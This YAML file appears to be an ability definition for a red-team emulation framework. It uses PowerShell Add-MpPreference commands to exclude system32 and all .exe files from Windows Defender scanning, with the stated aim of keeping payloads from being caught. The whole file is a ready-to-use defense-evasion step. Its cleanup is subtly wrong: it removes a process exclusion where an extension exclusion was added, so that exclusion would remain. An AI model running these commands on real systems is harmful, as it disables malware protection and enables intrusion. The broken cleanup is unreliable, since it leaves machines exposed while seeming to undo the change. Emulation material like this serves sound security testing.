---
- id: ba9c1c9e-3b43-45db-855d-73da0c7fd5ec
  name: Disable Windows Defender
  description: Requires Administrative access, adds exception to allow any executables in c:\windows\system32\ to execute. This will prevent Real-Time protection from eating our payloads.
  tactic: defense-evasion
  technique:
    attack_id: T1089
    name: Disabling Security Tools
  privilege: Elevated
  platforms:
    windows:
      psh:
        command: |
          Add-MpPreference -ExclusionPath "c:\windows\system32\*";
          Add-MpPreference -ExclusionExtension *.exe;
        cleanup:
          Remove-MpPreference -ExclusionPath "c:\windows\system32\*";
          Remove-MpPreference -ExclusionProcess *.exe;
